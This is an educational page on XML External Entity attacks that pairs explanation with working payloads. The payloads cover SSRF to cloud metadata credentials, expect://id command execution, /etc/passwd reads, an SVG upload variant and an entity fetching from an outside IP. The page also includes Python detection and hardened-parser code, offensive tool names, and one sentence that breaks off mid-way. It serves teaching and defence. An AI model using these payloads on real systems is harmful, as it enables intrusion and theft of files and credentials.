External XML Entity (XXE)

What Is XXE?
Why XXE Happens
XXE Types
Impact
How To Find
Mitigation
Tools
Reference
Labs
What Is XXE?
What is XML?
XML stands for "Extensible Markup Language". It is the most common language for storing and transporting data, and it is self-descriptive: it has no predefined tags like <p> or <img>. All tags are user-defined according to the data they represent, for example <email></email> or <message></message>.
If XML entities are new to you, read up on them first; the rest of this page assumes that background.
Definition of XXE:
An XML External Entity attack is an attack against an application that parses XML input and allows XML entities. An entity can instruct the XML parser to fetch specific content on the server (a local file, or a URL the server can reach) and substitute it into the document.

What is the Document Type Definition (DTD)?
It describes the structure of the document which contains elements and attributes declarations. The element declaration contains the allowable set of elements that will be used within the document. The attribute declaration contains the allowable set of attributes corresponding to each element.
Syntax:
<!DOCTYPE element DTD identifier
[
declaration1
declaration2
........
]>
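To make the DTD syntax above concrete, here is an added example (not code from the original page) using Python's standard-library ElementTree. It declares an entity inside an internal DTD and shows the parser substituting its value; it then declares the same entity with SYSTEM, which makes it external. The documents and the placeholder URI are constructed for this example, and the behaviour relied on is the documented one: ElementTree expands internal entities but never fetches external ones, raising ParseError instead.

```python
import xml.etree.ElementTree as ET

# Constructed sample: an internal DTD declaring a general entity "greeting",
# referenced from element content. The parser substitutes the entity's value.
INTERNAL_ENTITY_DOC = """<?xml version="1.0"?>
<!DOCTYPE message [
  <!ELEMENT message ANY>
  <!ENTITY greeting "Hello from an internal entity">
]>
<message>&greeting;</message>"""

# Constructed sample: the same document, but the entity is declared with
# SYSTEM, i.e. it is *external* and its value must be fetched from a URI.
# This is the construct XXE abuses; the URI is a placeholder, not a real file.
EXTERNAL_ENTITY_DOC = """<?xml version="1.0"?>
<!DOCTYPE message [
  <!ENTITY ext SYSTEM "file:///placeholder/not-a-real-file">
]>
<message>&ext;</message>"""


def expand_internal_entity(doc):
    """Parse the document and return the text of the root element.

    expat (behind ElementTree) expands internal entities, so the returned
    text is the entity's replacement value, not the literal '&greeting;'.
    """
    return ET.fromstring(doc).text


def external_entity_resolved(doc):
    """Return the resolved text if the parser fetched the external entity,
    or None if it refused. ElementTree never fetches external entities; it
    raises ParseError ("undefined entity") when one is referenced.
    """
    try:
        return ET.fromstring(doc).text
    except ET.ParseError:
        return None


if __name__ == "__main__":
    print(expand_internal_entity(INTERNAL_ENTITY_DOC))   # the entity's value
    print(external_entity_resolved(EXTERNAL_ENTITY_DOC))  # None
```

The second call is the whole point: a parser that resolves SYSTEM entities would return the contents of whatever the URI points to, which is exactly the behaviour the rest of this page exploits and the mitigation section switches off.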


Why XXE Happens
Some applications use the XML format to transmit data between the browser and the server. Applications that do this virtually always use a standard library or platform API to process the XML data on the server. XXE vulnerabilities arise because the XML specification contains various potentially dangerous features, and standard parsers support these features even if they are not normally used by the application.
XXE Types
Basic XXE
Blind XXE
Blind XXE
Blind XXE vulnerabilities arise where the application is vulnerable to XXE injection but does not return the values of any defined external entities within its responses. This means that direct retrieval of server-side files is not possible, and so blind XXE is generally harder to exploit than regular XXE vulnerabilities.
There are two broad ways to find and exploit blind XXE vulnerabilities:
Trigger out-of-band network interactions, sometimes exfiltrating sensitive data within the interaction data.
Trigger XML parsing errors in such a way that the error messages contain sensitive data.
Impact
XML External Entity (XXE) injection can pose a severe threat to a company or a web developer. XXE has always been in the OWASP Top 10 list. Many websites use XML for the storage and transportation of data, and if countermeasures are not taken this information can be compromised. Attacks that become possible include:
Server-Side Request Forgery (SSRF)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>
Remote Code Execution (RCE)
The expect:// wrapper used below exists only where PHP's expect extension is installed, which is uncommon, so this payload applies to far fewer environments than the others.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "expect://id" >]>
<stockCheck><productId>&xxe;</productId></stockCheck>

Read Files
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>
Cross-Site Scripting (XSS)
<![CDATA[<]]>script<![CDATA[>]]>alert(1)<![CDATA[<]]>/script<![CDATA[>]]>
Content-Type: from JSON to XXE. To change the request body from JSON to XML you can use the Burp extension "Content Type Converter".
Here you can find this example:
Content-Type: application/json;charset=UTF-8
{"root": {"root": {
"firstName": "Avinash",
"lastName": "",
"country": "United States",
"city": "ddd",
"postalCode": "ddd"
}}}
Content-Type: application/xml;charset=UTF-8
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM "http://34.229.92.127:8000/TEST.ext" >]>
<root>
<root>
<firstName>&xxe;</firstName>
<lastName/>
<country>United States</country>
<city>ddd</city>
<postalCode>ddd</postalCode>
</root>
</root>
File Upload
XXE can also be performed through file upload. We demonstrate this using the PortSwigger lab "Exploiting XXE via Image Upload". The payload we use is:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE reset [
<!ENTITY xxe SYSTEM "file:///etc/hostname"> ] >
<svg width="500px" height="500px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="40" x="0" y="100">
&xxe;
</text>
</svg>
Understanding the payload: we make an SVG file because the upload area accepts only image files. The basic syntax of the SVG file is given above, and inside it we have added a text element that will
We save the above code as "payload.svg". Then, in the PortSwigger lab, we open a post, add a comment, and supply the payload file in the avatar field.
How To Find
Look for any endpoint that parses XML data (or accepts JSON that can be re-sent as XML) and try injecting an XXE payload there.
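The same signatures that make a request worth testing are what a defender should be alerting on. The following is an added example, not part of the original page, of a small detector that scans XML request bodies for the constructs every payload on this page depends on (a DOCTYPE, entity declarations, SYSTEM/PUBLIC identifiers, parameter entities, file:// URIs, the link-local metadata address) and assigns a triage level. The request bodies, the rule names and the severity scale are all constructed for this example; the UTF-16 sample is included because a byte-level pattern match silently misses it unless the body is normalised first.

```python
import re

# Constructed sample request bodies, not captured traffic. They mirror the
# payload shapes discussed on this page plus one harmless document and a
# UTF-16 re-encoding of the file-read payload.
SAMPLES = {
    "benign": b'<?xml version="1.0"?><stockCheck><productId>381</productId></stockCheck>',
    "file_read": (b'<?xml version="1.0"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
                  b'<stockCheck><productId>&xxe;</productId></stockCheck>'),
    "ssrf": (b'<?xml version="1.0"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM '
             b'"http://169.254.169.254/latest/meta-data/"> ]><stockCheck><productId>&xxe;</productId></stockCheck>'),
    "param_entity": (b'<?xml version="1.0"?><!DOCTYPE foo [ <!ENTITY % ext SYSTEM '
                     b'"http://placeholder.invalid/x.dtd"> %ext; ]><stockCheck/>'),
    "doctype_only": b'<!DOCTYPE note SYSTEM "note.dtd"><note><to>Ops</to></note>',
    "utf16_file_read": ('<?xml version="1.0"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
                        '<stockCheck><productId>&xxe;</productId></stockCheck>').encode("utf-16"),
}

# Each rule names one XXE building block. Matching is case-insensitive so
# that mixed-case variants are not missed, even though XML itself is strict.
RULES = [
    ("doctype",             re.compile(rb"<!DOCTYPE", re.I)),
    ("entity_declaration",  re.compile(rb"<!ENTITY\s", re.I)),
    ("external_entity",     re.compile(rb"<!ENTITY\s[^>]*?\b(SYSTEM|PUBLIC)\b", re.I)),
    ("parameter_entity",    re.compile(rb"<!ENTITY\s+%", re.I)),
    ("file_scheme",         re.compile(rb"\bfile:///", re.I)),
    ("link_local_metadata", re.compile(rb"169\.254\.169\.254")),
]


def normalize(body):
    """Re-encode BOM-prefixed UTF-16 bodies as UTF-8 so ASCII patterns match.

    Without this step every byte of a UTF-16 document is interleaved with a
    NUL and none of the rules above would fire.
    """
    if body[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return body.decode("utf-16").encode("utf-8")
    return body


def scan_xml_body(body):
    """Return the names of all rules that match the (normalised) body."""
    body = normalize(body)
    return [name for name, rx in RULES if rx.search(body)]


def severity(findings):
    """Constructed triage scale: external or parameter entities are the
    constructs that actually fetch data, so they rate highest; a bare
    DOCTYPE or internal entity is still worth a look."""
    if {"external_entity", "parameter_entity"} & set(findings):
        return "high"
    if findings:
        return "medium"
    return "none"


def triage(samples):
    """Map each sample name to its severity level."""
    return {name: severity(scan_xml_body(body)) for name, body in samples.items()}


if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:16s} {severity(scan_xml_body(body)):6s} {scan_xml_body(body)}")
```

Run it over your own request logs by replacing the SAMPLES dictionary; anything rated "high" on an endpoint that is not supposed to accept DTDs at all is either an attack attempt or a client that should be fixed.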
Mitigation
The best way to avoid XXE vulnerabilities is to:
Disable document type definitions (DTDs) in your XML parser altogether.
If that is impossible, disable external entities and document type declarations for your parser.
Disable support for XInclude.
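Both settings above can be shown side by side with Python's standard library. This is an added example, not code from the original page: safe_parse() implements the preferred option (refuse any DOCTYPE before ElementTree ever sees the document, so no DTD and no entity can be declared), and parse_without_external_entities() implements the fallback (keep DTDs but turn off external general and parameter entities via the SAX feature flags, so a reference such as &xxe; contributes nothing). The two documents are constructed for the example and the SYSTEM identifier is a placeholder path, not a real file.

```python
import io
import xml.etree.ElementTree as ET
import xml.sax
from xml.parsers import expat
from xml.sax import handler

# Constructed sample documents (not captured traffic): a harmless stock check
# and the same document carrying an external entity with a placeholder path.
BENIGN = b'<?xml version="1.0"?><stockCheck><productId>381</productId></stockCheck>'
XXE_DOC = (b'<?xml version="1.0"?>'
           b'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///placeholder/not-a-real-file"> ]>'
           b'<stockCheck><productId>&xxe;</productId></stockCheck>')


class DoctypeForbidden(ValueError):
    """Raised when a document carries a DOCTYPE and therefore may define a DTD."""


def reject_doctype(xml_bytes):
    """Preferred setting: refuse DTDs outright.

    Runs a throw-away expat pass whose DOCTYPE callback aborts the parse. The
    callback fires before any declaration inside the DTD is processed, so no
    entity, internal or external, can be declared, let alone resolved.
    """
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeForbidden("DOCTYPE %r is not accepted" % name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_bytes, True)


def safe_parse(xml_bytes):
    """Parse untrusted XML into an Element, rejecting any DOCTYPE first."""
    reject_doctype(xml_bytes)
    return ET.fromstring(xml_bytes)


def doctype_is_rejected(xml_bytes):
    """True if safe_parse() refuses the document because of a DOCTYPE."""
    try:
        safe_parse(xml_bytes)
    except DoctypeForbidden:
        return True
    return False


class _ProductIdCollector(handler.ContentHandler):
    """Minimal SAX handler that records the text of the productId element."""

    def __init__(self):
        super().__init__()
        self.inside = False
        self.product_id = ""

    def startElement(self, name, attrs):
        self.inside = name == "productId"

    def endElement(self, name):
        if name == "productId":
            self.inside = False

    def characters(self, content):
        if self.inside:
            self.product_id += content


def parse_without_external_entities(xml_bytes):
    """Fallback setting: DTDs stay enabled, external entities do not.

    With feature_external_ges and feature_external_pes switched off, the SAX
    expat reader declines to fetch external general or parameter entities, so
    &xxe; yields no text instead of file contents. Returns the productId text.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, False)
    parser.setFeature(handler.feature_external_pes, False)
    collector = _ProductIdCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return collector.product_id


if __name__ == "__main__":
    print(safe_parse(BENIGN).find("productId").text)        # 381
    print(doctype_is_rejected(XXE_DOC))                      # True
    print(repr(parse_without_external_entities(XXE_DOC)))    # ''
```

The DOCTYPE gate parses each body twice, which is a fair price for small request bodies; the same two checks are what the defusedxml package wraps around the standard-library parsers, and it is the usual production choice. Note that the fallback silently drops the entity rather than failing, so log the event if you use it, otherwise a probe leaves no trace.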
Tools
xxeftp: A mini web server with FTP support for XXE payloads
xxexploiter: Tool to help exploit XXE vulnerabilities
230-OOB: An out-of-band XXE server for retrieving file contents over FTP and payload generation via http://xxe.sh/
XXEinjector: Tool for automatic exploitation of XXE vulnerabilities using direct and different out-of-band methods
oxml_xxe: A tool for embedding XXE/XML exploits into different file types (DOCX/XLSX/PPTX, ODT/ODG/ODP/ODS, SVG, XML, PDF, JPG, GIF)
docem: Utility to embed XXE and XSS payloads in docx, odt, pptx, etc.
otori: Toolbox intended to allow useful exploitation of XXE vulnerabilities.
Reference
Labs
PortSwigger Labs (the solution write-up was linked from the original page)
OWASP Broken Web Applications Project: install this machine and you will have a lot of labs such as DVWA, bWAPP, WebGoat, etc.